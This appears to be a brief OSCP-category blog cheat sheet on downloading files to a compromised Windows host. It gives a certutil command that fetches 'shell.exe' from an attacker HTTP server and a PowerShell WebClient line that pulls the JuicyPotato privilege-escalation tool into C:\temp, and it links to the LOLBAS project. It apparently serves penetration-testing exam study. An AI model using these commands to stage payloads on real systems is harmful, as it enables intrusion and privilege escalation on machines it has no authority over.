Download Files Windows

  • Post author:
  • Post category:OSCP

Download Files Windows

Download Files with Certutil

certutil.exe -urlcache -f http://10.9.218.104/shell.exe shell.exe

Using Powershell to download files to Windows

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.35/JuicyPotato.exe’,’C:\temp\JuicyPotato.exe’)”

Also Great resource

https://lolbas-project.github.io/